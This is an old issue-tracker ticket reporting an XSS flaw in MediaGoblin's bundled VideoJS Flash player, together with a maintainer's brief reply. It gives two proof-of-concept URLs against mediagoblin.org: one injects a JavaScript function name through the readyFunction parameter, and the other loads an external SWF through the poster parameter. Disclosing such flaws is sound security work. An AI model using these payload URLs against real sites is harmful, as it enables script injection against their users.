Legacy issue tracker

You are currently viewing the legacy bug tracker for MediaGoblin. We have now switched to code hosting and issue tracking at SourceHut.

This legacy issue tracker remains available to allow us to reference old issues. If you find a ticket here which is still relevant, please feel free to continue the discussion. For new issues, please use SourceHut.

Context Navigation

← Previous Ticket
Next Ticket →

Opened 7 years ago

Last modified 7 years ago

#5528 new defect

xss in videojs-swf

Reported by:	shivbihari pandey	Owned by:
Priority:	major	Milestone:
Component:	programming	Keywords:
Cc:		Parent Tickets:

Description

found xss in videojs swf

https://mediagoblin.org/js/extlib/video-js/video-js.swf?readyFunction=alert

https://mediagoblin.org/js/extlib/video-js/video-js.swf?poster=http://www.flash-test.net/relog.swf

VideoJS does not escape metadata passed to JavaScript via ExternalInterface.

Change History (1)

comment:1 by Boris Bobrov, 7 years ago

How do i exploit it?

Note: See TracTickets for help on using tickets.

Download in other formats: